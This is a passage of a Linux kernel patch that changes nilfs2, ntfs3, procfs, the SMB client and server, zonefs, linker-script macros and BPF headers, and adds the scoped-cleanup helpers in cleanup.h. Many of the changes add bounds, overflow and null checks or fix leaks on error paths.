+ int nilfs_dat_prepare_start(struct inode *dat, struct nilfs_palloc_req *req)
+ {
+-	int ret;
+-
+-	ret = nilfs_dat_prepare_entry(dat, req, 0);
+-	WARN_ON(ret == -ENOENT);
+-	return ret;
++	return nilfs_dat_prepare_entry(dat, req, 0);
+ }
+ 
+ void nilfs_dat_commit_start(struct inode *dat, struct nilfs_palloc_req *req,
+@@ -154,10 +163,8 @@ int nilfs_dat_prepare_end(struct inode *dat, struct nilfs_palloc_req *req)
+ 	int ret;
+ 
+ 	ret = nilfs_dat_prepare_entry(dat, req, 0);
+-	if (ret < 0) {
+-		WARN_ON(ret == -ENOENT);
++	if (ret < 0)
+ 		return ret;
+-	}
+ 
+ 	kaddr = kmap_atomic(req->pr_entry_bh->b_page);
+ 	entry = nilfs_palloc_block_get_entry(dat, req->pr_entry_nr,
+diff --git a/fs/nilfs2/file.c b/fs/nilfs2/file.c
+index a265d391ffe92..822e8d95d31ef 100644
+--- a/fs/nilfs2/file.c
++++ b/fs/nilfs2/file.c
+@@ -105,7 +105,13 @@ static vm_fault_t nilfs_page_mkwrite(struct vm_fault *vmf)
+ 	nilfs_transaction_commit(inode->i_sb);
+ 
+  mapped:
+-	wait_for_stable_page(page);
++	/*
++	 * Since checksumming including data blocks is performed to determine
++	 * the validity of the log to be written and used for recovery, it is
++	 * necessary to wait for writeback to finish here, regardless of the
++	 * stable write requirement of the backing device.
++	 */
++	wait_on_page_writeback(page);
+  out:
+ 	sb_end_pagefault(inode->i_sb);
+ 	return block_page_mkwrite_return(ret);
+diff --git a/fs/nilfs2/recovery.c b/fs/nilfs2/recovery.c
+index 0955b657938ff..a9b8d77c8c1d5 100644
+--- a/fs/nilfs2/recovery.c
++++ b/fs/nilfs2/recovery.c
+@@ -472,9 +472,10 @@ static int nilfs_prepare_segment_for_recovery(struct the_nilfs *nilfs,
+ 
+ static int nilfs_recovery_copy_block(struct the_nilfs *nilfs,
+ 				     struct nilfs_recovery_block *rb,
+-				     struct page *page)
++				     loff_t pos, struct page *page)
+ {
+ 	struct buffer_head *bh_org;
++	size_t from = pos & ~PAGE_MASK;
+ 	void *kaddr;
+ 
+ 	bh_org = __bread(nilfs->ns_bdev, rb->blocknr, nilfs->ns_blocksize);
+@@ -482,7 +483,7 @@ static int nilfs_recovery_copy_block(struct the_nilfs *nilfs,
+ 		return -EIO;
+ 
+ 	kaddr = kmap_atomic(page);
+-	memcpy(kaddr + bh_offset(bh_org), bh_org->b_data, bh_org->b_size);
++	memcpy(kaddr + from, bh_org->b_data, bh_org->b_size);
+ 	kunmap_atomic(kaddr);
+ 	brelse(bh_org);
+ 	return 0;
+@@ -521,7 +522,7 @@ static int nilfs_recover_dsync_blocks(struct the_nilfs *nilfs,
+ 			goto failed_inode;
+ 		}
+ 
+-		err = nilfs_recovery_copy_block(nilfs, rb, page);
++		err = nilfs_recovery_copy_block(nilfs, rb, pos, page);
+ 		if (unlikely(err))
+ 			goto failed_page;
+ 
+diff --git a/fs/nilfs2/segment.c b/fs/nilfs2/segment.c
+index a4a147a983e0a..0a84613960dbf 100644
+--- a/fs/nilfs2/segment.c
++++ b/fs/nilfs2/segment.c
+@@ -1702,7 +1702,6 @@ static void nilfs_segctor_prepare_write(struct nilfs_sc_info *sci)
+ 
+ 		list_for_each_entry(bh, &segbuf->sb_payload_buffers,
+ 				    b_assoc_buffers) {
+-			set_buffer_async_write(bh);
+ 			if (bh == segbuf->sb_super_root) {
+ 				if (bh->b_page != bd_page) {
+ 					lock_page(bd_page);
+@@ -1713,6 +1712,7 @@ static void nilfs_segctor_prepare_write(struct nilfs_sc_info *sci)
+ 				}
+ 				break;
+ 			}
++			set_buffer_async_write(bh);
+ 			if (bh->b_page != fs_page) {
+ 				nilfs_begin_page_io(fs_page);
+ 				fs_page = bh->b_page;
+@@ -1798,7 +1798,6 @@ static void nilfs_abort_logs(struct list_head *logs, int err)
+ 
+ 		list_for_each_entry(bh, &segbuf->sb_payload_buffers,
+ 				    b_assoc_buffers) {
+-			clear_buffer_async_write(bh);
+ 			if (bh == segbuf->sb_super_root) {
+ 				clear_buffer_uptodate(bh);
+ 				if (bh->b_page != bd_page) {
+@@ -1807,6 +1806,7 @@ static void nilfs_abort_logs(struct list_head *logs, int err)
+ 				}
+ 				break;
+ 			}
++			clear_buffer_async_write(bh);
+ 			if (bh->b_page != fs_page) {
+ 				nilfs_end_page_io(fs_page, err);
+ 				fs_page = bh->b_page;
+@@ -1894,8 +1894,9 @@ static void nilfs_segctor_complete_write(struct nilfs_sc_info *sci)
+ 				 BIT(BH_Delay) | BIT(BH_NILFS_Volatile) |
+ 				 BIT(BH_NILFS_Redirected));
+ 
+-			set_mask_bits(&bh->b_state, clear_bits, set_bits);
+ 			if (bh == segbuf->sb_super_root) {
++				set_buffer_uptodate(bh);
++				clear_buffer_dirty(bh);
+ 				if (bh->b_page != bd_page) {
+ 					end_page_writeback(bd_page);
+ 					bd_page = bh->b_page;
+@@ -1903,6 +1904,7 @@ static void nilfs_segctor_complete_write(struct nilfs_sc_info *sci)
+ 				update_sr = true;
+ 				break;
+ 			}
++			set_mask_bits(&bh->b_state, clear_bits, set_bits);
+ 			if (bh->b_page != fs_page) {
+ 				nilfs_end_page_io(fs_page, 0);
+ 				fs_page = bh->b_page;
+diff --git a/fs/ntfs3/fsntfs.c b/fs/ntfs3/fsntfs.c
+index 873b1434a9989..4b72bc7f12ca3 100644
+--- a/fs/ntfs3/fsntfs.c
++++ b/fs/ntfs3/fsntfs.c
+@@ -1842,10 +1842,12 @@ int ntfs_security_init(struct ntfs_sb_info *sbi)
+ 		goto out;
+ 	}
+ 
+-	root_sdh = resident_data_ex(attr, sizeof(struct INDEX_ROOT));
+-	if (root_sdh->type != ATTR_ZERO ||
++	if(!(root_sdh = resident_data_ex(attr, sizeof(struct INDEX_ROOT))) ||
++	    root_sdh->type != ATTR_ZERO ||
+ 	    root_sdh->rule != NTFS_COLLATION_TYPE_SECURITY_HASH ||
+-	    offsetof(struct INDEX_ROOT, ihdr) + root_sdh->ihdr.used > attr->res.data_size) {
++	    offsetof(struct INDEX_ROOT, ihdr) +
++			le32_to_cpu(root_sdh->ihdr.used) >
++			le32_to_cpu(attr->res.data_size)) {
+ 		err = -EINVAL;
+ 		goto out;
+ 	}
+@@ -1861,10 +1863,12 @@ int ntfs_security_init(struct ntfs_sb_info *sbi)
+ 		goto out;
+ 	}
+ 
+-	root_sii = resident_data_ex(attr, sizeof(struct INDEX_ROOT));
+-	if (root_sii->type != ATTR_ZERO ||
++	if(!(root_sii = resident_data_ex(attr, sizeof(struct INDEX_ROOT))) ||
++	    root_sii->type != ATTR_ZERO ||
+ 	    root_sii->rule != NTFS_COLLATION_TYPE_UINT ||
+-	    offsetof(struct INDEX_ROOT, ihdr) + root_sii->ihdr.used > attr->res.data_size) {
++	    offsetof(struct INDEX_ROOT, ihdr) +
++			le32_to_cpu(root_sii->ihdr.used) >
++			le32_to_cpu(attr->res.data_size)) {
+ 		err = -EINVAL;
+ 		goto out;
+ 	}
+diff --git a/fs/ntfs3/index.c b/fs/ntfs3/index.c
+index b89a33f5761ef..7371f7855e4c4 100644
+--- a/fs/ntfs3/index.c
++++ b/fs/ntfs3/index.c
+@@ -1097,7 +1097,8 @@ int indx_read(struct ntfs_index *indx, struct ntfs_inode *ni, CLST vbn,
+ 	}
+ 
+ 	/* check for index header length */
+-	if (offsetof(struct INDEX_BUFFER, ihdr) + ib->ihdr.used > bytes) {
++	if (offsetof(struct INDEX_BUFFER, ihdr) + le32_to_cpu(ib->ihdr.used) >
++	    bytes) {
+ 		err = -EINVAL;
+ 		goto out;
+ 	}
+diff --git a/fs/proc/array.c b/fs/proc/array.c
+index 49283b8103c7e..1b0d78dfd20f9 100644
+--- a/fs/proc/array.c
++++ b/fs/proc/array.c
+@@ -501,7 +501,7 @@ static int do_task_stat(struct seq_file *m, struct pid_namespace *ns,
+ 
+ 	sigemptyset(&sigign);
+ 	sigemptyset(&sigcatch);
+-	cutime = cstime = utime = stime = 0;
++	cutime = cstime = 0;
+ 	cgtime = gtime = 0;
+ 
+ 	if (lock_task_sighand(task, &flags)) {
+@@ -535,7 +535,6 @@ static int do_task_stat(struct seq_file *m, struct pid_namespace *ns,
+ 
+ 			min_flt += sig->min_flt;
+ 			maj_flt += sig->maj_flt;
+-			thread_group_cputime_adjusted(task, &utime, &stime);
+ 			gtime += sig->gtime;
+ 
+ 			if (sig->flags & (SIGNAL_GROUP_EXIT | SIGNAL_STOP_STOPPED))
+@@ -551,10 +550,13 @@ static int do_task_stat(struct seq_file *m, struct pid_namespace *ns,
+ 
+ 	if (permitted && (!whole || num_threads < 2))
+ 		wchan = !task_is_running(task);
+-	if (!whole) {
++
++	if (whole) {
++		thread_group_cputime_adjusted(task, &utime, &stime);
++	} else {
++		task_cputime_adjusted(task, &utime, &stime);
+ 		min_flt = task->min_flt;
+ 		maj_flt = task->maj_flt;
+-		task_cputime_adjusted(task, &utime, &stime);
+ 		gtime = task_gtime(task);
+ 	}
+ 
+diff --git a/fs/smb/client/cached_dir.c b/fs/smb/client/cached_dir.c
+index 5a132c1e6f6c4..6f4d7aa70e5a2 100644
+--- a/fs/smb/client/cached_dir.c
++++ b/fs/smb/client/cached_dir.c
+@@ -268,10 +268,12 @@ int open_cached_dir(unsigned int xid, struct cifs_tcon *tcon,
+ 	if (o_rsp->OplockLevel != SMB2_OPLOCK_LEVEL_LEASE)
+ 		goto oshr_free;
+ 
+-	smb2_parse_contexts(server, o_rsp,
++	rc = smb2_parse_contexts(server, rsp_iov,
+ 			    &oparms.fid->epoch,
+-			    oparms.fid->lease_key, &oplock,
+-			    NULL, NULL);
++			    oparms.fid->lease_key,
++			    &oplock, NULL, NULL);
++	if (rc)
++		goto oshr_free;
+ 	if (!(oplock & SMB2_LEASE_READ_CACHING_HE))
+ 		goto oshr_free;
+ 	qi_rsp = (struct smb2_query_info_rsp *)rsp_iov[1].iov_base;
+diff --git a/fs/smb/client/smb2ops.c b/fs/smb/client/smb2ops.c
+index 5a157000bdfe6..34d1262004dfb 100644
+--- a/fs/smb/client/smb2ops.c
++++ b/fs/smb/client/smb2ops.c
+@@ -613,7 +613,7 @@ parse_server_interfaces(struct network_interface_info_ioctl_rsp *buf,
+ 		goto out;
+ 	}
+ 
+-	while (bytes_left >= sizeof(*p)) {
++	while (bytes_left >= (ssize_t)sizeof(*p)) {
+ 		memset(&tmp_iface, 0, sizeof(tmp_iface));
+ 		tmp_iface.speed = le64_to_cpu(p->LinkSpeed);
+ 		tmp_iface.rdma_capable = le32_to_cpu(p->Capability & RDMA_CAPABLE) ? 1 : 0;
+diff --git a/fs/smb/client/smb2pdu.c b/fs/smb/client/smb2pdu.c
+index e65f998ea4cfc..c1fc1651d8b69 100644
+--- a/fs/smb/client/smb2pdu.c
++++ b/fs/smb/client/smb2pdu.c
+@@ -2145,17 +2145,18 @@ parse_posix_ctxt(struct create_context *cc, struct smb2_file_all_info *info,
+ 		 posix->nlink, posix->mode, posix->reparse_tag);
+ }
+ 
+-void
+-smb2_parse_contexts(struct TCP_Server_Info *server,
+-		    struct smb2_create_rsp *rsp,
+-		    unsigned int *epoch, char *lease_key, __u8 *oplock,
+-		    struct smb2_file_all_info *buf,
+-		    struct create_posix_rsp *posix)
++int smb2_parse_contexts(struct TCP_Server_Info *server,
++			struct kvec *rsp_iov,
++			unsigned int *epoch,
++			char *lease_key, __u8 *oplock,
++			struct smb2_file_all_info *buf,
++			struct create_posix_rsp *posix)
+ {
+-	char *data_offset;
++	struct smb2_create_rsp *rsp = rsp_iov->iov_base;
+ 	struct create_context *cc;
+-	unsigned int next;
+-	unsigned int remaining;
++	size_t rem, off, len;
++	size_t doff, dlen;
++	size_t noff, nlen;
+ 	char *name;
+ 	static const char smb3_create_tag_posix[] = {
+ 		0x93, 0xAD, 0x25, 0x50, 0x9C,
+@@ -2164,45 +2165,63 @@ smb2_parse_contexts(struct TCP_Server_Info *server,
+ 	};
+ 
+ 	*oplock = 0;
+-	data_offset = (char *)rsp + le32_to_cpu(rsp->CreateContextsOffset);
+-	remaining = le32_to_cpu(rsp->CreateContextsLength);
+-	cc = (struct create_context *)data_offset;
++
++	off = le32_to_cpu(rsp->CreateContextsOffset);
++	rem = le32_to_cpu(rsp->CreateContextsLength);
++	if (check_add_overflow(off, rem, &len) || len > rsp_iov->iov_len)
++		return -EINVAL;
++	cc = (struct create_context *)((u8 *)rsp + off);
+ 
+ 	/* Initialize inode number to 0 in case no valid data in qfid context */
+ 	if (buf)
+ 		buf->IndexNumber = 0;
+ 
+-	while (remaining >= sizeof(struct create_context)) {
+-		name = le16_to_cpu(cc->NameOffset) + (char *)cc;
+-		if (le16_to_cpu(cc->NameLength) == 4 &&
+-		    strncmp(name, SMB2_CREATE_REQUEST_LEASE, 4) == 0)
+-			*oplock = server->ops->parse_lease_buf(cc, epoch,
+-							   lease_key);
+-		else if (buf && (le16_to_cpu(cc->NameLength) == 4) &&
+-		    strncmp(name, SMB2_CREATE_QUERY_ON_DISK_ID, 4) == 0)
+-			parse_query_id_ctxt(cc, buf);
+-		else if ((le16_to_cpu(cc->NameLength) == 16)) {
+-			if (posix &&
+-			    memcmp(name, smb3_create_tag_posix, 16) == 0)
++	while (rem >= sizeof(*cc)) {
++		doff = le16_to_cpu(cc->DataOffset);
++		dlen = le32_to_cpu(cc->DataLength);
++		if (check_add_overflow(doff, dlen, &len) || len > rem)
++			return -EINVAL;
++
++		noff = le16_to_cpu(cc->NameOffset);
++		nlen = le16_to_cpu(cc->NameLength);
++		if (noff + nlen > doff)
++			return -EINVAL;
++
++		name = (char *)cc + noff;
++		switch (nlen) {
++		case 4:
++			if (!strncmp(name, SMB2_CREATE_REQUEST_LEASE, 4)) {
++				*oplock = server->ops->parse_lease_buf(cc, epoch,
++								       lease_key);
++			} else if (buf &&
++				   !strncmp(name, SMB2_CREATE_QUERY_ON_DISK_ID, 4)) {
++				parse_query_id_ctxt(cc, buf);
++			}
++			break;
++		case 16:
++			if (posix && !memcmp(name, smb3_create_tag_posix, 16))
+ 				parse_posix_ctxt(cc, buf, posix);
++			break;
++		default:
++			cifs_dbg(FYI, "%s: unhandled context (nlen=%zu dlen=%zu)\n",
++				 __func__, nlen, dlen);
++			if (IS_ENABLED(CONFIG_CIFS_DEBUG2))
++				cifs_dump_mem("context data: ", cc, dlen);
++			break;
+ 		}
+-		/* else {
+-			cifs_dbg(FYI, "Context not matched with len %d\n",
+-				le16_to_cpu(cc->NameLength));
+-			cifs_dump_mem("Cctxt name: ", name, 4);
+-		} */
+-
+-		next = le32_to_cpu(cc->Next);
+-		if (!next)
++
++		off = le32_to_cpu(cc->Next);
++		if (!off)
+ 			break;
+-		remaining -= next;
+-		cc = (struct create_context *)((char *)cc + next);
++		if (check_sub_overflow(rem, off, &rem))
++			return -EINVAL;
++		cc = (struct create_context *)((u8 *)cc + off);
+ 	}
+ 
+ 	if (rsp->OplockLevel != SMB2_OPLOCK_LEVEL_LEASE)
+ 		*oplock = rsp->OplockLevel;
+ 
+-	return;
++	return 0;
+ }
+ 
+ static int
+@@ -3082,8 +3101,8 @@ SMB2_open(const unsigned int xid, struct cifs_open_parms *oparms, __le16 *path,
+ 	}
+ 
+ 
+-	smb2_parse_contexts(server, rsp, &oparms->fid->epoch,
+-			    oparms->fid->lease_key, oplock, buf, posix);
++	rc = smb2_parse_contexts(server, &rsp_iov, &oparms->fid->epoch,
++				 oparms->fid->lease_key, oplock, buf, posix);
+ creat_exit:
+ 	SMB2_open_free(&rqst);
+ 	free_rsp_buf(resp_buftype, rsp);
+diff --git a/fs/smb/client/smb2proto.h b/fs/smb/client/smb2proto.h
+index be21b5d26f67e..b325fde010adc 100644
+--- a/fs/smb/client/smb2proto.h
++++ b/fs/smb/client/smb2proto.h
+@@ -249,11 +249,13 @@ extern int smb3_validate_negotiate(const unsigned int, struct cifs_tcon *);
+ 
+ extern enum securityEnum smb2_select_sectype(struct TCP_Server_Info *,
+ 					enum securityEnum);
+-extern void smb2_parse_contexts(struct TCP_Server_Info *server,
+-				struct smb2_create_rsp *rsp,
+-				unsigned int *epoch, char *lease_key,
+-				__u8 *oplock, struct smb2_file_all_info *buf,
+-				struct create_posix_rsp *posix);
++int smb2_parse_contexts(struct TCP_Server_Info *server,
++			struct kvec *rsp_iov,
++			unsigned int *epoch,
++			char *lease_key, __u8 *oplock,
++			struct smb2_file_all_info *buf,
++			struct create_posix_rsp *posix);
++
+ extern int smb3_encryption_required(const struct cifs_tcon *tcon);
+ extern int smb2_validate_iov(unsigned int offset, unsigned int buffer_length,
+ 			     struct kvec *iov, unsigned int min_buf_size);
+diff --git a/fs/smb/server/smb2pdu.c b/fs/smb/server/smb2pdu.c
+index 4cfa45c2727ea..66d25d0e34d8b 100644
+--- a/fs/smb/server/smb2pdu.c
++++ b/fs/smb/server/smb2pdu.c
+@@ -6171,8 +6171,10 @@ static noinline int smb2_read_pipe(struct ksmbd_work *work)
+ 		err = ksmbd_iov_pin_rsp_read(work, (void *)rsp,
+ 					     offsetof(struct smb2_read_rsp, Buffer),
+ 					     aux_payload_buf, nbytes);
+-		if (err)
++		if (err) {
++			kvfree(aux_payload_buf);
+ 			goto out;
++		}
+ 		kvfree(rpc_resp);
+ 	} else {
+ 		err = ksmbd_iov_pin_rsp(work, (void *)rsp,
+@@ -6382,8 +6384,10 @@ int smb2_read(struct ksmbd_work *work)
+ 	err = ksmbd_iov_pin_rsp_read(work, (void *)rsp,
+ 				     offsetof(struct smb2_read_rsp, Buffer),
+ 				     aux_payload_buf, nbytes);
+-	if (err)
++	if (err) {
++		kvfree(aux_payload_buf);
+ 		goto out;
++	}
+ 	ksmbd_fd_put(work, fp);
+ 	return 0;
+ 
+diff --git a/fs/zonefs/file.c b/fs/zonefs/file.c
+index 63cd50840419c..8d5f4a5a74e65 100644
+--- a/fs/zonefs/file.c
++++ b/fs/zonefs/file.c
+@@ -349,7 +349,12 @@ static int zonefs_file_write_dio_end_io(struct kiocb *iocb, ssize_t size,
+ 	struct zonefs_inode_info *zi = ZONEFS_I(inode);
+ 
+ 	if (error) {
+-		zonefs_io_error(inode, true);
++		/*
++		 * For Sync IOs, error recovery is called from
++		 * zonefs_file_dio_write().
++		 */
++		if (!is_sync_kiocb(iocb))
++			zonefs_io_error(inode, true);
+ 		return error;
+ 	}
+ 
+@@ -577,6 +582,14 @@ static ssize_t zonefs_file_dio_write(struct kiocb *iocb, struct iov_iter *from)
+ 			ret = -EINVAL;
+ 			goto inode_unlock;
+ 		}
++		/*
++		 * Advance the zone write pointer offset. This assumes that the
++		 * IO will succeed, which is OK to do because we do not allow
++		 * partial writes (IOMAP_DIO_PARTIAL is not set) and if the IO
++		 * fails, the error path will correct the write pointer offset.
++		 */
++		z->z_wpoffset += count;
++		zonefs_inode_account_active(inode);
+ 		mutex_unlock(&zi->i_truncate_mutex);
+ 		append = sync;
+ 	}
+@@ -596,20 +609,19 @@ static ssize_t zonefs_file_dio_write(struct kiocb *iocb, struct iov_iter *from)
+ 			ret = -EBUSY;
+ 	}
+ 
+-	if (zonefs_zone_is_seq(z) &&
+-	    (ret > 0 || ret == -EIOCBQUEUED)) {
+-		if (ret > 0)
+-			count = ret;
+-
+-		/*
+-		 * Update the zone write pointer offset assuming the write
+-		 * operation succeeded. If it did not, the error recovery path
+-		 * will correct it. Also do active seq file accounting.
+-		 */
+-		mutex_lock(&zi->i_truncate_mutex);
+-		z->z_wpoffset += count;
+-		zonefs_inode_account_active(inode);
+-		mutex_unlock(&zi->i_truncate_mutex);
++	/*
++	 * For a failed IO or partial completion, trigger error recovery
++	 * to update the zone write pointer offset to a correct value.
++	 * For asynchronous IOs, zonefs_file_write_dio_end_io() may already
++	 * have executed error recovery if the IO already completed when we
++	 * reach here. However, we cannot know that and execute error recovery
++	 * again (that will not change anything).
++	 */
++	if (zonefs_zone_is_seq(z)) {
++		if (ret > 0 && ret != count)
++			ret = -EIO;
++		if (ret < 0 && ret != -EIOCBQUEUED)
++			zonefs_io_error(inode, true);
+ 	}
+ 
+ inode_unlock:
+diff --git a/fs/zonefs/super.c b/fs/zonefs/super.c
+index 270ded209dde5..f6b701261078c 100644
+--- a/fs/zonefs/super.c
++++ b/fs/zonefs/super.c
+@@ -245,16 +245,18 @@ static void zonefs_inode_update_mode(struct inode *inode)
+ 	z->z_flags &= ~ZONEFS_ZONE_INIT_MODE;
+ }
+ 
+-struct zonefs_ioerr_data {
+-	struct inode	*inode;
+-	bool		write;
+-};
+-
+ static int zonefs_io_error_cb(struct blk_zone *zone, unsigned int idx,
+ 			      void *data)
+ {
+-	struct zonefs_ioerr_data *err = data;
+-	struct inode *inode = err->inode;
++	struct blk_zone *z = data;
++
++	*z = *zone;
++	return 0;
++}
++
++static void zonefs_handle_io_error(struct inode *inode, struct blk_zone *zone,
++				   bool write)
++{
+ 	struct zonefs_zone *z = zonefs_inode_zone(inode);
+ 	struct super_block *sb = inode->i_sb;
+ 	struct zonefs_sb_info *sbi = ZONEFS_SB(sb);
+@@ -269,8 +271,8 @@ static int zonefs_io_error_cb(struct blk_zone *zone, unsigned int idx,
+ 	data_size = zonefs_check_zone_condition(sb, z, zone);
+ 	isize = i_size_read(inode);
+ 	if (!(z->z_flags & (ZONEFS_ZONE_READONLY | ZONEFS_ZONE_OFFLINE)) &&
+-	    !err->write && isize == data_size)
+-		return 0;
++	    !write && isize == data_size)
++		return;
+ 
+ 	/*
+ 	 * At this point, we detected either a bad zone or an inconsistency
+@@ -291,7 +293,7 @@ static int zonefs_io_error_cb(struct blk_zone *zone, unsigned int idx,
+ 	 * In all cases, warn about inode size inconsistency and handle the
+ 	 * IO error according to the zone condition and to the mount options.
+ 	 */
+-	if (zonefs_zone_is_seq(z) && isize != data_size)
++	if (isize != data_size)
+ 		zonefs_warn(sb,
+ 			    "inode %lu: invalid size %lld (should be %lld)\n",
+ 			    inode->i_ino, isize, data_size);
+@@ -351,8 +353,6 @@ static int zonefs_io_error_cb(struct blk_zone *zone, unsigned int idx,
+ 	zonefs_i_size_write(inode, data_size);
+ 	z->z_wpoffset = data_size;
+ 	zonefs_inode_account_active(inode);
+-
+-	return 0;
+ }
+ 
+ /*
+@@ -366,23 +366,25 @@ void __zonefs_io_error(struct inode *inode, bool write)
+ {
+ 	struct zonefs_zone *z = zonefs_inode_zone(inode);
+ 	struct super_block *sb = inode->i_sb;
+-	struct zonefs_sb_info *sbi = ZONEFS_SB(sb);
+ 	unsigned int noio_flag;
+-	unsigned int nr_zones = 1;
+-	struct zonefs_ioerr_data err = {
+-		.inode = inode,
+-		.write = write,
+-	};
++	struct blk_zone zone;
+ 	int ret;
+ 
+ 	/*
+-	 * The only files that have more than one zone are conventional zone
+-	 * files with aggregated conventional zones, for which the inode zone
+-	 * size is always larger than the device zone size.
++	 * Conventional zone have no write pointer and cannot become read-only
++	 * or offline. So simply fake a report for a single or aggregated zone
++	 * and let zonefs_handle_io_error() correct the zone inode information
++	 * according to the mount options.
+ 	 */
+-	if (z->z_size > bdev_zone_sectors(sb->s_bdev))
+-		nr_zones = z->z_size >>
+-			(sbi->s_zone_sectors_shift + SECTOR_SHIFT);
++	if (!zonefs_zone_is_seq(z)) {
++		zone.start = z->z_sector;
++		zone.len = z->z_size >> SECTOR_SHIFT;
++		zone.wp = zone.start + zone.len;
++		zone.type = BLK_ZONE_TYPE_CONVENTIONAL;
++		zone.cond = BLK_ZONE_COND_NOT_WP;
++		zone.capacity = zone.len;
++		goto handle_io_error;
++	}
+ 
+ 	/*
+ 	 * Memory allocations in blkdev_report_zones() can trigger a memory
+@@ -393,12 +395,20 @@ void __zonefs_io_error(struct inode *inode, bool write)
+ 	 * the GFP_NOIO context avoids both problems.
+ 	 */
+ 	noio_flag = memalloc_noio_save();
+-	ret = blkdev_report_zones(sb->s_bdev, z->z_sector, nr_zones,
+-				  zonefs_io_error_cb, &err);
+-	if (ret != nr_zones)
++	ret = blkdev_report_zones(sb->s_bdev, z->z_sector, 1,
++				  zonefs_io_error_cb, &zone);
++	memalloc_noio_restore(noio_flag);
++
++	if (ret != 1) {
+ 		zonefs_err(sb, "Get inode %lu zone information failed %d\n",
+ 			   inode->i_ino, ret);
+-	memalloc_noio_restore(noio_flag);
++		zonefs_warn(sb, "remounting filesystem read-only\n");
++		sb->s_flags |= SB_RDONLY;
++		return;
++	}
++
++handle_io_error:
++	zonefs_handle_io_error(inode, &zone, write);
+ }
+ 
+ static struct kmem_cache *zonefs_inode_cachep;
+diff --git a/include/asm-generic/vmlinux.lds.h b/include/asm-generic/vmlinux.lds.h
+index 7ad6f51b3d914..1d1f480a5e9e4 100644
+--- a/include/asm-generic/vmlinux.lds.h
++++ b/include/asm-generic/vmlinux.lds.h
+@@ -351,7 +351,6 @@
+ 	*(.ref.data)							\
+ 	*(.data..shared_aligned) /* percpu related */			\
+ 	MEM_KEEP(init.data*)						\
+-	MEM_KEEP(exit.data*)						\
+ 	*(.data.unlikely)						\
+ 	__start_once = .;						\
+ 	*(.data.once)							\
+@@ -546,7 +545,6 @@
+ 	__init_rodata : AT(ADDR(__init_rodata) - LOAD_OFFSET) {		\
+ 		*(.ref.rodata)						\
+ 		MEM_KEEP(init.rodata)					\
+-		MEM_KEEP(exit.rodata)					\
+ 	}								\
+ 									\
+ 	/* Built-in module parameters. */				\
+@@ -601,7 +599,6 @@
+ 		*(.ref.text)						\
+ 		*(.text.asan.* .text.tsan.*)				\
+ 	MEM_KEEP(init.text*)						\
+-	MEM_KEEP(exit.text*)						\
+ 
+ 
+ /* sched.text is aling to function alignment to secure we have same
+@@ -751,13 +748,10 @@
+ 	*(.exit.data .exit.data.*)					\
+ 	*(.fini_array .fini_array.*)					\
+ 	*(.dtors .dtors.*)						\
+-	MEM_DISCARD(exit.data*)						\
+-	MEM_DISCARD(exit.rodata*)
+ 
+ #define EXIT_TEXT							\
+ 	*(.exit.text)							\
+ 	*(.text.exit)							\
+-	MEM_DISCARD(exit.text)
+ 
+ #define EXIT_CALL							\
+ 	*(.exitcall.exit)
+diff --git a/include/linux/bpf.h b/include/linux/bpf.h
+index c04a61ffac8ae..1ca1902af23e9 100644
+--- a/include/linux/bpf.h
++++ b/include/linux/bpf.h
+@@ -2739,10 +2739,18 @@ struct btf_id_set;
+ bool btf_id_set_contains(const struct btf_id_set *set, u32 id);
+ 
+ #define MAX_BPRINTF_VARARGS		12
++#define MAX_BPRINTF_BUF			1024
++
++struct bpf_bprintf_data {
++	u32 *bin_args;
++	char *buf;
++	bool get_bin_args;
++	bool get_buf;
++};
+ 
+ int bpf_bprintf_prepare(char *fmt, u32 fmt_size, const u64 *raw_args,
+-			u32 **bin_buf, u32 num_args);
+-void bpf_bprintf_cleanup(void);
++			u32 num_args, struct bpf_bprintf_data *data);
++void bpf_bprintf_cleanup(struct bpf_bprintf_data *data);
+ 
+ /* the implementation of the opaque uapi struct bpf_dynptr */
+ struct bpf_dynptr_kern {
+diff --git a/include/linux/cleanup.h b/include/linux/cleanup.h
+new file mode 100644
+index 0000000000000..53f1a7a932b08
+--- /dev/null
++++ b/include/linux/cleanup.h
+@@ -0,0 +1,171 @@
++/* SPDX-License-Identifier: GPL-2.0 */
++#ifndef __LINUX_GUARDS_H
++#define __LINUX_GUARDS_H
++
++#include <linux/compiler.h>
++
++/*
++ * DEFINE_FREE(name, type, free):
++ *	simple helper macro that defines the required wrapper for a __free()
++ *	based cleanup function. @free is an expression using '_T' to access
++ *	the variable.
++ *
++ * __free(name):
++ *	variable attribute to add a scoped based cleanup to the variable.
++ *
++ * no_free_ptr(var):
++ *	like a non-atomic xchg(var, NULL), such that the cleanup function will
++ *	be inhibited -- provided it sanely deals with a NULL value.
++ *
++ * return_ptr(p):
++ *	returns p while inhibiting the __free().
++ *
++ * Ex.
++ *
++ * DEFINE_FREE(kfree, void *, if (_T) kfree(_T))
++ *
++ *	struct obj *p __free(kfree) = kmalloc(...);
++ *	if (!p)
++ *		return NULL;
++ *
++ *	if (!init_obj(p))
++ *		return NULL;
++ *
++ *	return_ptr(p);
++ */
++
++#define DEFINE_FREE(_name, _type, _free) \
++	static inline void __free_##_name(void *p) { _type _T = *(_type *)p; _free; }
++
++#define __free(_name)	__cleanup(__free_##_name)
++
++#define no_free_ptr(p) \
++	({ __auto_type __ptr = (p); (p) = NULL; __ptr; })
++
++#define return_ptr(p)	return no_free_ptr(p)
++
++
++/*
++ * DEFINE_CLASS(name, type, exit, init, init_args...):
++ *	helper to define the destructor and constructor for a type.
++ *	@exit is an expression using '_T' -- similar to FREE above.
++ *	@init is an expression in @init_args resulting in @type
++ *
++ * EXTEND_CLASS(name, ext, init, init_args...):
++ *	extends class @name to @name@ext with the new constructor
++ *
++ * CLASS(name, var)(args...):
++ *	declare the variable @var as an instance of the named class
++ *
++ * Ex.
++ *
++ * DEFINE_CLASS(fdget, struct fd, fdput(_T), fdget(fd), int fd)
++ *
++ *	CLASS(fdget, f)(fd);
++ *	if (!f.file)
++ *		return -EBADF;
++ *
++ *	// use 'f' without concern
++ */
++
++#define DEFINE_CLASS(_name, _type, _exit, _init, _init_args...)		\
++typedef _type class_##_name##_t;					\
++static inline void class_##_name##_destructor(_type *p)			\
++{ _type _T = *p; _exit; }						\
++static inline _type class_##_name##_constructor(_init_args)		\
++{ _type t = _init; return t; }
++
++#define EXTEND_CLASS(_name, ext, _init, _init_args...)			\
++typedef class_##_name##_t class_##_name##ext##_t;			\
++static inline void class_##_name##ext##_destructor(class_##_name##_t *p)\
++{ class_##_name##_destructor(p); }					\
++static inline class_##_name##_t class_##_name##ext##_constructor(_init_args) \
++{ class_##_name##_t t = _init; return t; }
++
++#define CLASS(_name, var)						\
